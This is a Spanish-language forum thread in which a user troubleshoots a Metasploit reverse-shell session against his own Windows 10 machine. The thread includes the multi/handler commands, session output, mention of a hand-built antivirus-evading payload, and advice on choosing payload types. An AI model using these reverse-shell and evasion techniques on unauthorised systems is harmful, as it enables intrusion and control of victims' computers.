El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 24-10-2021 19:55:06

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 859

Metasploit: session abierta pero sin meterpreter

Buenas cool


Soy haciendo purebas con metasploit y un payload que he hecho a mano para que no me detectan los antivirus.Y me sale bien porqué no esta detectado por ningun antivirus.Eso no esta complicado a hacer cuando sabes que los antivirus detectan solamente lo que conocen...



Entonces tengo un problemo, no puedo conseguir une consola meterpreter aunqué la sesión esta abierta en el terminal.Soy usando kali-linux 2021.3 con metasploit v6.1.8-dev.


Mi objectivo es mi ordenador con windows 10, al dia y con avast antivirus.


Suelo usar esos comandos con metasploit para abrir la sesión:



msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set EXE::Custom /tmp/koalapayload.exe
EXE::Custom => /tmp/koalapayload.exe
msf6 exploit(multi/handler) > set LHOST 192.168.1.**
LHOST => 192.168.1.**
msf6 exploit(multi/handler) > set LPORT 8111
LPORT => 8111
msf6 exploit(multi/handler) > exploit

Casi en séguida puedo ver que la sesión etsa abierta:


[*] Started reverse TCP handler on 192.168.1.**:8111
[*] Command shell session 1 opened (192.168.1.**:8111 -> 192.168.1.**:60201) at 2021-10-24 19:57:33 +0200

El problemo es que no puedo conséguir una sesión meterpreter , se abre la sesión pero se queda bloqueada.


Meterpreter bloqueado


Puedo conséguir a ver el répertorio dondé he iniciado el payload en el ordenador de la victima con el comando "dir" pero sin poder hacer nada mas."cd", "rm", "execute" y todas los otros comandos no andan.Parece que solamente puedo ver lo que hay en el ordenador de la victima sin poder hacer algo mas...


He intentado de hacer un

sessions 1

Y se queda bloqueado


sessions 1
[*] Session 1 is already interactive.

sesion bloqueada


O sea he pasado la sesión en "background" para ver si podia recuperar la despuès pero no me viene tambien.

background
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell sparc/bsd               192.168.1.**:8111 -> 192.168.1.**:60201 (192.168.1.**)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1... 

Despuès de eso nada se esta moviendo en la consola... Para probar que el problemo no viene del antivirus, le apagado pero el problemo sigue igual.He abierto una tema en el github de metasploit para ver si tendré una solucion pero no sé si no me lo van a suprimir, mi inglès esta muy limitado...


A ver si alguien me puede hechar una mano smile  si tengo la solucion en el git de metasploit ya la pondré aqui.


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 25-10-2021 14:11:54

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,477

Re: Metasploit: session abierta pero sin meterpreter

En el ultimo copiado-pegado podemos leer que la consola es de tipo sparc/bsd y diría que tiene que ser de tipo "win" o "windows" o algo así.
En este hilo del repositorio Github comentan que no hay que fiarse de la opción  generic/shell_reverse_tcp: Windows shell detected as shell sparc/bsd
Va a seleccionar automáticamente el tipo de payload y suele equivocarse.
Deberías probar con un tipo de payload más especifico,

Desconectado

#3 25-10-2021 17:55:10

Koala
Very Important Usuario

Registrado: 11-09-2016
Mensajes: 859

Re: Metasploit: session abierta pero sin meterpreter

Buenas smile


He hecho pruebas con payload mas espesifico.Ahora my sesion es abierta y esta detectado como "windows" pero sigue igual, puedo ver y hacer andar calc.exe o cmd.exe en el ordenador de la victima pero sin ver la salida en meterpreter que se queda bloqueado y sin poder modificar ficheros en el ordenador de la victima.


sessions -i

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               192.168.1.**:8111 -> 192.168.1.**:57309 (192.168.1.**)

He probado con un payload en arquitectura x64, me detecta bien la sesion en x64
 

Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows 

En el ordenador de la victima podemos ver que mi payload esta andando en el task manager de windows10


imagen payload


Y el cmd.exe que he iniciado en kali sale en el ordenador de la victima tambien


cmd task manager



Pero sigue igual no consigo tener una consola meterpreter..


Hostbase rogue AP project con Kali-linux xfce.

Debian--Arch--Kali--DFlinux

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Pie de página

Información del usuario

Ultimo usuario registrado: posgrau
Usuarios registrados conectados: 0
Invitados conectados: 12

Estadisticas de los foros

Número total de usuarios registrados: 2,256
Número total de temas: 1,565
Número total de mensajes: 14,962

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36